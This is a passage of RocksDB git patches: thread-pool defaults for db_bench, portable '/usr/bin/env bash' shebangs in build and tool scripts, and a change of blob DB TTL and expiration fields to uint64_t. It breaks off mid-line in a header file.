DEFINE_int32(max_background_compactions, rocksdb::Options().max_background_compactions, "The maximum number of concurrent background compactions" @@ -5242,6 +5246,8 @@ int db_bench_tool(int argc, char** argv) { FLAGS_env->SetBackgroundThreads(FLAGS_max_background_compactions); FLAGS_env->SetBackgroundThreads(FLAGS_max_background_flushes, rocksdb::Env::Priority::HIGH); + FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads, + rocksdb::Env::Priority::BOTTOM); // Choose a location for the test database if none given with --db= if (FLAGS_db.empty()) { diff --git a/util/threadpool_imp.cc b/util/threadpool_imp.cc index aa40ab9cd4c..f38e6422b46 100644 --- a/util/threadpool_imp.cc +++ b/util/threadpool_imp.cc @@ -123,11 +123,11 @@ struct ThreadPoolImpl::Impl { inline ThreadPoolImpl::Impl::Impl() - : + : low_io_priority_(false), priority_(Env::LOW), env_(nullptr), - total_threads_limit_(1), + total_threads_limit_(0), queue_len_(), exit_all_threads_(false), wait_for_jobs_to_complete_(false), @@ -372,7 +372,7 @@ int ThreadPoolImpl::Impl::UnSchedule(void* arg) { return count; } -ThreadPoolImpl::ThreadPoolImpl() : +ThreadPoolImpl::ThreadPoolImpl() : impl_(new Impl()) { } From 5883a1ae24b790e52bf86011f33924e78250564d Mon Sep 17 00:00:00 2001 From: Alan Somers Date: Thu, 3 Aug 2017 15:43:05 -0700 Subject: [PATCH 074/205] Fix /bin/bash shebangs Summary: "/bin/bash" is a Linuxism. "/usr/bin/env bash" is portable. Closes https://github.com/facebook/rocksdb/pull/2646 Differential Revision: D5556259 Pulled By: ajkr fbshipit-source-id: cbffd38ecdbfffb2438969ec007ab345ed893ccb --- buckifier/rocks_test_runner.sh | 2 +- build_tools/cont_integration.sh | 2 +- build_tools/dockerbuild.sh | 2 +- build_tools/format-diff.sh | 2 +- build_tools/regression_build_test.sh | 2 +- build_tools/rocksdb-lego-determinator | 2 +- coverage/coverage_test.sh | 2 +- tools/benchmark.sh | 2 +- tools/benchmark_leveldb.sh | 2 +- tools/check_format_compatible.sh | 2 +- tools/dbench_monitor | 2 +- tools/generate_random_db.sh | 2 +- tools/pflag | 2 +- tools/rdb/rdb | 2 +- tools/regression_test.sh | 2 +- tools/run_flash_bench.sh | 2 +- tools/run_leveldb.sh | 2 +- tools/verify_random_db.sh | 2 +- 18 files changed, 18 insertions(+), 18 deletions(-) diff --git a/buckifier/rocks_test_runner.sh b/buckifier/rocks_test_runner.sh index 2ee216934d7..e1f48a760d3 100755 --- a/buckifier/rocks_test_runner.sh +++ b/buckifier/rocks_test_runner.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # Create a tmp directory for the test to use TEST_DIR=$(mktemp -d /dev/shm/fbcode_rocksdb_XXXXXXX) TEST_TMPDIR="$TEST_DIR" $@ && rm -rf "$TEST_DIR" diff --git a/build_tools/cont_integration.sh b/build_tools/cont_integration.sh index 4e1905e7e31..06f25c596e4 100755 --- a/build_tools/cont_integration.sh +++ b/build_tools/cont_integration.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # Copyright (c) 2016, Facebook. All rights reserved. # diff --git a/build_tools/dockerbuild.sh b/build_tools/dockerbuild.sh index 2685380bf13..02f60944286 100755 --- a/build_tools/dockerbuild.sh +++ b/build_tools/dockerbuild.sh @@ -1,2 +1,2 @@ -#!/bin/bash +#!/usr/bin/env bash docker run -v $PWD:/rocks -w /rocks buildpack-deps make diff --git a/build_tools/format-diff.sh b/build_tools/format-diff.sh index 868452a92ab..81221ed9a49 100755 --- a/build_tools/format-diff.sh +++ b/build_tools/format-diff.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # If clang_format_diff.py command is not specfied, we assume we are able to # access directly without any path. if [ -z $CLANG_FORMAT_DIFF ] diff --git a/build_tools/regression_build_test.sh b/build_tools/regression_build_test.sh index 76589882106..6980633287c 100755 --- a/build_tools/regression_build_test.sh +++ b/build_tools/regression_build_test.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e diff --git a/build_tools/rocksdb-lego-determinator b/build_tools/rocksdb-lego-determinator index 09e79f376a8..300a60aab95 100755 --- a/build_tools/rocksdb-lego-determinator +++ b/build_tools/rocksdb-lego-determinator @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # This script is executed by Sandcastle # to determine next steps to run diff --git a/coverage/coverage_test.sh b/coverage/coverage_test.sh index 4d8052c9e4f..6d87ae90867 100755 --- a/coverage/coverage_test.sh +++ b/coverage/coverage_test.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # Exit on error. set -e diff --git a/tools/benchmark.sh b/tools/benchmark.sh index 46e1c6567dd..1a2c38439cf 100755 --- a/tools/benchmark.sh +++ b/tools/benchmark.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # REQUIRE: db_bench binary exists in the current directory if [ $# -ne 1 ]; then diff --git a/tools/benchmark_leveldb.sh b/tools/benchmark_leveldb.sh index dce66d47adf..7769969809f 100755 --- a/tools/benchmark_leveldb.sh +++ b/tools/benchmark_leveldb.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # REQUIRE: db_bench binary exists in the current directory # # This should be used with the LevelDB fork listed here to use additional test options. diff --git a/tools/check_format_compatible.sh b/tools/check_format_compatible.sh index 2f3805e5ab2..801648963ec 100755 --- a/tools/check_format_compatible.sh +++ b/tools/check_format_compatible.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # A shell script to load some pre generated data file to a DB using ldb tool # ./ldb needs to be avaible to be executed. diff --git a/tools/dbench_monitor b/tools/dbench_monitor index 10726dc2324..d85f9d070c0 100755 --- a/tools/dbench_monitor +++ b/tools/dbench_monitor @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # #(c) 2004-present, Facebook Inc. All rights reserved. # diff --git a/tools/generate_random_db.sh b/tools/generate_random_db.sh index 28bdceb2baa..e10843bab88 100755 --- a/tools/generate_random_db.sh +++ b/tools/generate_random_db.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # A shell script to load some pre generated data file to a DB using ldb tool # ./ldb needs to be avaible to be executed. diff --git a/tools/pflag b/tools/pflag index adfac23bc9f..f3394a66649 100755 --- a/tools/pflag +++ b/tools/pflag @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # #(c) 2004-present, Facebook, all rights reserved. # See the LICENSE file for usage and distribution rights. diff --git a/tools/rdb/rdb b/tools/rdb/rdb index 82cd17fb7ec..05da1158b8d 100755 --- a/tools/rdb/rdb +++ b/tools/rdb/rdb @@ -1,3 +1,3 @@ -#!/bin/bash +#!/usr/bin/env bash node -e "RDB = require('./build/Release/rdb').DBWrapper; console.log('Loaded rocksdb in variable RDB'); repl = require('repl').start('> ');" diff --git a/tools/regression_test.sh b/tools/regression_test.sh index 7801da14f00..58558bbe4af 100755 --- a/tools/regression_test.sh +++ b/tools/regression_test.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # The RocksDB regression test script. # REQUIREMENT: must be able to run make db_bench in the current directory # diff --git a/tools/run_flash_bench.sh b/tools/run_flash_bench.sh index 76c16bb5955..4d9d0d55750 100755 --- a/tools/run_flash_bench.sh +++ b/tools/run_flash_bench.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # REQUIRE: benchmark.sh exists in the current directory # After execution of this script, log files are generated in $output_dir. # report.txt provides a high level statistics diff --git a/tools/run_leveldb.sh b/tools/run_leveldb.sh index 884312e3db6..de628c310ca 100755 --- a/tools/run_leveldb.sh +++ b/tools/run_leveldb.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # REQUIRE: benchmark_leveldb.sh exists in the current directory # After execution of this script, log files are generated in $output_dir. # report.txt provides a high level statistics diff --git a/tools/verify_random_db.sh b/tools/verify_random_db.sh index 8ff6a3fd18d..7000f5a1aa9 100755 --- a/tools/verify_random_db.sh +++ b/tools/verify_random_db.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # A shell script to verify DB generated by generate_random_db.sh cannot opened and read correct data. # ./ldb needs to be avaible to be executed. From 92afe830f91a3c8e507f2cbffae379a369c59da2 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 3 Aug 2017 17:46:00 -0700 Subject: [PATCH 075/205] Update all blob db TTL and timestamps to uint64_t Summary: The current blob db implementation use mix of int32_t, uint32_t and uint64_t for TTL and expiration. Update all timestamps to uint64_t for consistency. Closes https://github.com/facebook/rocksdb/pull/2683 Differential Revision: D5557103 Pulled By: yiwu-arbug fbshipit-source-id: e4eab2691629a755e614e8cf1eed9c3a681d0c42 --- utilities/blob_db/blob_db.h | 14 ++--- utilities/blob_db/blob_db_impl.cc | 82 ++++++++++++++-------------- utilities/blob_db/blob_db_impl.h | 17 +++--- utilities/blob_db/blob_db_test.cc | 10 ++-- utilities/blob_db/blob_dump_tool.cc | 14 ++--- utilities/blob_db/blob_file.cc | 4 +- utilities/blob_db/blob_log_format.cc | 30 +++++----- utilities/blob_db/blob_log_format.h | 33 ++++++----- utilities/blob_db/blob_log_writer.cc | 18 +++--- utilities/blob_db/blob_log_writer.h | 4 +- 10 files changed, 112 insertions(+), 114 deletions(-) diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index b645ea6efdd..8d6725f60e0 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -50,7 +50,7 @@ struct BlobDBOptions { // first bucket is 1471542000 - 1471542600 // second bucket is 1471542600 - 1471543200 // and so on - uint32_t ttl_range_secs = 3600; + uint64_t ttl_range_secs = 3600; // at what bytes will the blob files be synced to blob log. uint64_t bytes_per_sync = 0; @@ -97,21 +97,21 @@ class BlobDB : public StackableDB { virtual Status PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, int32_t ttl) = 0; + const Slice& value, uint64_t ttl) = 0; virtual Status PutWithTTL(const WriteOptions& options, const Slice& key, - const Slice& value, int32_t ttl) { + const Slice& value, uint64_t ttl) { return PutWithTTL(options, DefaultColumnFamily(), key, value, ttl); } - // Put with expiration. Key with expiration time equal to -1 - // means the key don't expire. + // Put with expiration. Key with expiration time equal to + // std::numeric_limits::max() means the key don't expire. virtual Status PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, int32_t expiration) = 0; + const Slice& value, uint64_t expiration) = 0; virtual Status PutUntil(const WriteOptions& options, const Slice& key, - const Slice& value, int32_t expiration) { + const Slice& value, uint64_t expiration) { return PutUntil(options, DefaultColumnFamily(), key, value, expiration); } diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 1afdc94a06e..f35bc4ac3f5 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -37,7 +37,7 @@ namespace { int kBlockBasedTableVersionFormat = 2; -void extendTTL(rocksdb::blob_db::ttlrange_t* ttl_range, uint32_t ttl) { +void extendTTL(rocksdb::blob_db::ttlrange_t* ttl_range, uint64_t ttl) { ttl_range->first = std::min(ttl_range->first, ttl); ttl_range->second = std::max(ttl_range->second, ttl); } @@ -489,9 +489,8 @@ Status BlobDBImpl::OpenAllFiles() { ttl_range.first + (uint32_t)bdb_options_.ttl_range_secs); bfptr->set_ttl_range(ttl_range); - std::time_t epoch_now = std::chrono::system_clock::to_time_t( - std::chrono::system_clock::now()); - if (ttl_range.second < epoch_now) { + uint64_t now = EpochNow(); + if (ttl_range.second < now) { Status fstatus = CreateWriterLocked(bfptr); if (fstatus.ok()) fstatus = bfptr->WriteFooterAndCloseLocked(); if (!fstatus.ok()) { @@ -503,7 +502,7 @@ Status BlobDBImpl::OpenAllFiles() { } else { ROCKS_LOG_ERROR(db_options_.info_log, "Blob File Closed: %s now: %d ttl_range: (%d, %d)", - bfpath.c_str(), epoch_now, ttl_range.first, + bfpath.c_str(), now, ttl_range.first, ttl_range.second); } } else { @@ -591,7 +590,7 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { } std::shared_ptr BlobDBImpl::FindBlobFileLocked( - uint32_t expiration) const { + uint64_t expiration) const { if (open_blob_files_.empty()) return nullptr; std::shared_ptr tmp = std::make_shared(); @@ -684,7 +683,8 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { return bfile; } -std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint32_t expiration) { +std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { + assert(expiration != kNoExpiration); uint64_t epoch_read = 0; std::shared_ptr bfile; { @@ -698,9 +698,9 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint32_t expiration) { return bfile; } - uint32_t exp_low = + uint64_t exp_low = (expiration / bdb_options_.ttl_range_secs) * bdb_options_.ttl_range_secs; - uint32_t exp_high = exp_low + bdb_options_.ttl_range_secs; + uint64_t exp_high = exp_low + bdb_options_.ttl_range_secs; ttlrange_t ttl_guess = std::make_pair(exp_low, exp_high); bfile = NewBlobFile("SelectBlobFileTTL"); @@ -758,7 +758,7 @@ Status BlobDBImpl::Put(const WriteOptions& options, const Slice& value) { std::string new_value; Slice value_slice; - int32_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); + uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); return PutUntil(options, column_family, key, value_slice, expiration); } @@ -808,11 +808,11 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value_slice) override { Slice value_unc; - int32_t expiration = + uint64_t expiration = impl_->ExtractExpiration(key, value_slice, &value_unc, &new_value_); std::shared_ptr bfile = - (expiration != -1) + (expiration != kNoExpiration) ? impl_->SelectBlobFileTTL(expiration) : ((last_file_) ? last_file_ : impl_->SelectBlobFile()); if (last_file_ && last_file_ != bfile) { @@ -840,8 +840,8 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { sequence_++; } - if (expiration != -1) { - extendTTL(&(bfile->ttl_range_), (uint32_t)expiration); + if (expiration != kNoExpiration) { + extendTTL(&(bfile->ttl_range_), expiration); } if (!st.ok()) { @@ -935,9 +935,10 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { Status BlobDBImpl::PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value, - int32_t ttl) { - return PutUntil(options, column_family, key, value, - static_cast(EpochNow()) + ttl); + uint64_t ttl) { + uint64_t now = EpochNow(); + assert(std::numeric_limits::max() - now > ttl); + return PutUntil(options, column_family, key, value, now + ttl); } Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, @@ -952,15 +953,15 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, return *compression_output; } -// TODO(yiwu): We should use uint64_t for expiration. Status BlobDBImpl::PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value_unc, int32_t expiration) { + const Slice& value_unc, uint64_t expiration) { MutexLock l(&write_mutex_); UpdateWriteOptions(options); - std::shared_ptr bfile = - (expiration != -1) ? SelectBlobFileTTL(expiration) : SelectBlobFile(); + std::shared_ptr bfile = (expiration != kNoExpiration) + ? SelectBlobFileTTL(expiration) + : SelectBlobFile(); if (!bfile) return Status::NotFound("Blob file not found"); @@ -1020,29 +1021,27 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, bfile->DumpState().c_str()); } - if (expiration != -1) extendTTL(&(bfile->ttl_range_), (uint32_t)expiration); + if (expiration != kNoExpiration) { + extendTTL(&(bfile->ttl_range_), expiration); + } CloseIf(bfile); return s; } -// TODO(yiwu): We should return uint64_t after updating the rest of the code -// to use uint64_t for expiration. -int32_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, - Slice* value_slice, - std::string* new_value) { +uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, + Slice* value_slice, + std::string* new_value) { uint64_t expiration = kNoExpiration; + bool has_expiration = false; bool value_changed = false; if (ttl_extractor_ != nullptr) { - bool has_ttl = ttl_extractor_->ExtractExpiration( + has_expiration = ttl_extractor_->ExtractExpiration( key, value, EpochNow(), &expiration, new_value, &value_changed); - if (!has_ttl) { - expiration = kNoExpiration; - } } *value_slice = value_changed ? Slice(*new_value) : value; - return (expiration == kNoExpiration) ? -1 : static_cast(expiration); + return has_expiration ? expiration : kNoExpiration; } Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, @@ -1847,11 +1846,11 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, // Ideally we should hold the lock during the entire function, // but under the asusmption that this is only called when a // file is Immutable, we can reduce the critical section -bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, std::time_t tt, +bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, uint64_t last_id, std::string* reason) { if (bfile->HasTTL()) { ttlrange_t ttl_range = bfile->GetTTLRange(); - if (tt > ttl_range.second) { + if (now > ttl_range.second) { *reason = "entire file ttl expired"; return true; } @@ -2057,8 +2056,7 @@ void BlobDBImpl::FilterSubsetOfFiles( // 100.0 / 15.0 = 7 uint64_t next_epoch_increment = static_cast( std::ceil(100 / static_cast(kGCFilePercentage))); - std::chrono::system_clock::time_point now = std::chrono::system_clock::now(); - std::time_t tt = std::chrono::system_clock::to_time_t(now); + uint64_t now = EpochNow(); size_t files_processed = 0; for (auto bfile : blob_files) { @@ -2081,18 +2079,20 @@ void BlobDBImpl::FilterSubsetOfFiles( if (bfile->Obsolete() || !bfile->Immutable()) continue; std::string reason; - bool shouldgc = ShouldGCFile(bfile, tt, last_id, &reason); + bool shouldgc = ShouldGCFile(bfile, now, last_id, &reason); if (!shouldgc) { ROCKS_LOG_DEBUG(db_options_.info_log, - "File has been skipped for GC ttl %s %d %d reason='%s'", - bfile->PathName().c_str(), tt, + "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64 + " reason='%s'", + bfile->PathName().c_str(), now, bfile->GetTTLRange().second, reason.c_str()); continue; } ROCKS_LOG_INFO(db_options_.info_log, - "File has been chosen for GC ttl %s %d %d reason='%s'", - bfile->PathName().c_str(), tt, bfile->GetTTLRange().second, + "File has been chosen for GC ttl %s %" PRIu64 " %" PRIu64 + " reason='%s'", + bfile->PathName().c_str(), now, bfile->GetTTLRange().second, reason.c_str()); to_process->push_back(bfile); } diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 5105c8c17b1..d812604bef5 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -202,9 +202,6 @@ class BlobDBImpl : public BlobDB { // how often to schedule check seq files period static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; - static constexpr uint64_t kNoExpiration = - std::numeric_limits::max(); - using rocksdb::StackableDB::Put; Status Put(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value) override; @@ -238,12 +235,12 @@ class BlobDBImpl : public BlobDB { using BlobDB::PutWithTTL; Status PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, int32_t ttl) override; + const Slice& value, uint64_t ttl) override; using BlobDB::PutUntil; Status PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value_unc, int32_t expiration) override; + const Slice& value_unc, uint64_t expiration) override; Status LinkToBaseDB(DB* db) override; @@ -290,7 +287,7 @@ class BlobDBImpl : public BlobDB { // has expired or if threshold of the file has been evicted // tt - current time // last_id - the id of the non-TTL file to evict - bool ShouldGCFile(std::shared_ptr bfile, std::time_t tt, + bool ShouldGCFile(std::shared_ptr bfile, uint64_t now, uint64_t last_id, std::string* reason); // collect all the blob log files from the blob directory @@ -299,8 +296,8 @@ class BlobDBImpl : public BlobDB { // appends a task into timer queue to close the file void CloseIf(const std::shared_ptr& bfile); - int32_t ExtractExpiration(const Slice& key, const Slice& value, - Slice* value_slice, std::string* new_value); + uint64_t ExtractExpiration(const Slice& key, const Slice& value, + Slice* value_slice, std::string* new_value); Status AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, @@ -311,12 +308,12 @@ class BlobDBImpl : public BlobDB { // find an existing blob log file based on the expiration unix epoch // if such a file does not exist, return nullptr - std::shared_ptr SelectBlobFileTTL(uint32_t expiration); + std::shared_ptr SelectBlobFileTTL(uint64_t expiration); // find an existing blob log file to append the value to std::shared_ptr SelectBlobFile(); - std::shared_ptr FindBlobFileLocked(uint32_t expiration) const; + std::shared_ptr FindBlobFileLocked(uint64_t expiration) const; void UpdateWriteOptions(const WriteOptions& options); diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 199a9e0750a..9f3ae1b012f 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -63,7 +63,7 @@ class BlobDBTest : public testing::Test { } } - void PutRandomWithTTL(const std::string &key, int32_t ttl, Random *rnd, + void PutRandomWithTTL(const std::string &key, uint64_t ttl, Random *rnd, std::map *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; std::string value = test::RandomHumanReadableString(rnd, len); @@ -74,7 +74,7 @@ class BlobDBTest : public testing::Test { } } - void PutRandomUntil(const std::string &key, int32_t expiration, Random *rnd, + void PutRandomUntil(const std::string &key, uint64_t expiration, Random *rnd, std::map *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; std::string value = test::RandomHumanReadableString(rnd, len); @@ -136,7 +136,7 @@ class BlobDBTest : public testing::Test { Random rnd(301); for (size_t i = 0; i < 100000; i++) { - int32_t ttl = rnd.Next() % 86400; + uint64_t ttl = rnd.Next() % 86400; PutRandomWithTTL("key" + ToString(i % 500), ttl, &rnd, nullptr); } @@ -175,7 +175,7 @@ TEST_F(BlobDBTest, PutWithTTL) { std::map data; mock_env_->set_now_micros(50 * 1000000); for (size_t i = 0; i < 100; i++) { - int32_t ttl = rnd.Next() % 100; + uint64_t ttl = rnd.Next() % 100; PutRandomWithTTL("key" + ToString(i), ttl, &rnd, (ttl < 50 ? nullptr : &data)); } @@ -204,7 +204,7 @@ TEST_F(BlobDBTest, PutUntil) { std::map data; mock_env_->set_now_micros(50 * 1000000); for (size_t i = 0; i < 100; i++) { - int32_t expiration = rnd.Next() % 100 + 50; + uint64_t expiration = rnd.Next() % 100 + 50; PutRandomUntil("key" + ToString(i), expiration, &rnd, (expiration < 100 ? nullptr : &data)); } diff --git a/utilities/blob_db/blob_dump_tool.cc b/utilities/blob_db/blob_dump_tool.cc index f426802c2f9..c9db7e8fa67 100644 --- a/utilities/blob_db/blob_dump_tool.cc +++ b/utilities/blob_db/blob_dump_tool.cc @@ -102,8 +102,8 @@ Status BlobDumpTool::DumpBlobLogHeader(uint64_t* offset) { return s; } fprintf(stdout, "Blob log header:\n"); - fprintf(stdout, " Magic Number : %u\n", header.magic_number()); - fprintf(stdout, " Version : %d\n", header.version()); + fprintf(stdout, " Magic Number : %" PRIu32 "\n", header.magic_number()); + fprintf(stdout, " Version : %" PRIu32 "\n", header.version()); CompressionType compression = header.compression(); std::string compression_str; if (!GetStringFromCompressionType(&compression_str, compression).ok()) { @@ -175,13 +175,13 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, } uint32_t key_size = record.GetKeySize(); uint64_t blob_size = record.GetBlobSize(); - fprintf(stdout, " key size : %d\n", key_size); + fprintf(stdout, " key size : %" PRIu32 "\n", key_size); fprintf(stdout, " blob size : %" PRIu64 "\n", record.GetBlobSize()); - fprintf(stdout, " TTL : %u\n", record.GetTTL()); + fprintf(stdout, " TTL : %" PRIu64 "\n", record.GetTTL()); fprintf(stdout, " time : %" PRIu64 "\n", record.GetTimeVal()); fprintf(stdout, " type : %d, %d\n", record.type(), record.subtype()); - fprintf(stdout, " header CRC : %u\n", record.header_checksum()); - fprintf(stdout, " CRC : %u\n", record.checksum()); + fprintf(stdout, " header CRC : %" PRIu32 "\n", record.header_checksum()); + fprintf(stdout, " CRC : %" PRIu32 "\n", record.checksum()); uint32_t header_crc = crc32c::Extend(0, slice.data(), slice.size() - 2 * sizeof(uint32_t)); *offset += BlobLogRecord::kHeaderSize; @@ -213,7 +213,7 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, if (!s.ok()) { return s; } - fprintf(stdout, " footer CRC : %u\n", record.footer_checksum()); + fprintf(stdout, " footer CRC : %" PRIu32 "\n", record.footer_checksum()); fprintf(stdout, " sequence : %" PRIu64 "\n", record.GetSN()); *offset += key_size + blob_size + BlobLogRecord::kFooterSize; return s; diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index 51bba2fb862..8ba005dd6e1 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -94,8 +94,8 @@ std::string BlobFile::DumpState() const { "path: %s fn: %" PRIu64 " blob_count: %" PRIu64 " gc_epoch: %" PRIu64 " file_size: %" PRIu64 " deleted_count: %" PRIu64 " deleted_size: %" PRIu64 - " closed: %d can_be_deleted: %d ttl_range: (%d, %d)" - " sn_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d", + " closed: %d can_be_deleted: %d ttl_range: (%" PRIu64 ", %" PRIu64 + ") sn_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d", path_to_dir_.c_str(), file_number_, blob_count_.load(), gc_epoch_.load(), file_size_.load(), deleted_count_, deleted_size_, closed_.load(), can_be_deleted_.load(), ttl_range_.first, diff --git a/utilities/blob_db/blob_log_format.cc b/utilities/blob_db/blob_log_format.cc index 6917a290f37..b5c8fe56e8b 100644 --- a/utilities/blob_db/blob_log_format.cc +++ b/utilities/blob_db/blob_log_format.cc @@ -61,8 +61,8 @@ Status BlobLogFooter::DecodeFrom(const Slice& input) { } ttlrange_t temp_ttl; - if (!GetFixed32(&slice, &temp_ttl.first) || - !GetFixed32(&slice, &temp_ttl.second)) { + if (!GetFixed64(&slice, &temp_ttl.first) || + !GetFixed64(&slice, &temp_ttl.second)) { return Status::Corruption("Invalid Blob Footer: ttl_range"); } if (has_ttl) { @@ -108,11 +108,11 @@ void BlobLogFooter::EncodeTo(std::string* dst) const { bool has_ts = HasTimestamp(); if (has_ttl) { - PutFixed32(dst, ttl_range_.get()->first); - PutFixed32(dst, ttl_range_.get()->second); + PutFixed64(dst, ttl_range_.get()->first); + PutFixed64(dst, ttl_range_.get()->second); } else { - PutFixed32(dst, 0); - PutFixed32(dst, 0); + PutFixed64(dst, 0); + PutFixed64(dst, 0); } PutFixed64(dst, sn_range_.first); PutFixed64(dst, sn_range_.second); @@ -149,11 +149,11 @@ void BlobLogHeader::EncodeTo(std::string* dst) const { PutFixed32(dst, val); if (has_ttl) { - PutFixed32(dst, ttl_guess_.get()->first); - PutFixed32(dst, ttl_guess_.get()->second); + PutFixed64(dst, ttl_guess_.get()->first); + PutFixed64(dst, ttl_guess_.get()->second); } else { - PutFixed32(dst, 0); - PutFixed32(dst, 0); + PutFixed64(dst, 0); + PutFixed64(dst, 0); } if (has_ts) { @@ -199,11 +199,13 @@ Status BlobLogHeader::DecodeFrom(const Slice& input) { } ttlrange_t temp_ttl; - if (!GetFixed32(&slice, &temp_ttl.first) || - !GetFixed32(&slice, &temp_ttl.second)) { + if (!GetFixed64(&slice, &temp_ttl.first) || + !GetFixed64(&slice, &temp_ttl.second)) { return Status::Corruption("Invalid Blob Log Header: ttl"); } - if (has_ttl) set_ttl_guess(temp_ttl); + if (has_ttl) { + set_ttl_guess(temp_ttl); + } tsrange_t temp_ts; if (!GetFixed64(&slice, &temp_ts.first) || @@ -265,7 +267,7 @@ Status BlobLogRecord::DecodeHeaderFrom(const Slice& hdrslice) { if (!GetFixed64(&input, &blob_size_)) { return Status::Corruption("Invalid Blob Record Header: blob_size"); } - if (!GetFixed32(&input, &ttl_val_)) { + if (!GetFixed64(&input, &ttl_val_)) { return Status::Corruption("Invalid Blob Record Header: ttl_val"); } if (!GetFixed64(&input, &time_val_)) { diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index f4e62fe2d96..5a22390b271 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -25,6 +25,8 @@ namespace blob_db { class BlobFile; class BlobDBImpl; +constexpr uint64_t kNoExpiration = std::numeric_limits::max(); + enum RecordType : uint8_t { // Zero is reserved for preallocated files kFullType = 0, @@ -46,9 +48,9 @@ extern const uint32_t kMagicNumber; class Reader; -typedef std::pair ttlrange_t; -typedef std::pair tsrange_t; -typedef std::pair snrange_t; +using ttlrange_t = std::pair; +using tsrange_t = std::pair; +using snrange_t = std::pair; class BlobLogHeader { friend class BlobFile; @@ -71,8 +73,8 @@ class BlobLogHeader { void set_ts_guess(const tsrange_t& ts) { ts_guess_.reset(new tsrange_t(ts)); } public: - // magic number + version + flags + ttl guess + timestamp range = 36 - static const size_t kHeaderSize = 4 + 4 + 4 + 4 * 2 + 8 * 2; + // magic number + version + flags + ttl guess + timestamp range = 44 + static const size_t kHeaderSize = 4 + 4 + 4 + 8 * 2 + 8 * 2; void EncodeTo(std::string* dst) const; @@ -100,9 +102,9 @@ class BlobLogHeader { return *ts_guess_; } - bool HasTTL() const { return !!ttl_guess_; } + bool HasTTL() const { return ttl_guess_ != nullptr; } - bool HasTimestamp() const { return !!ts_guess_; } + bool HasTimestamp() const { return ts_guess_ != 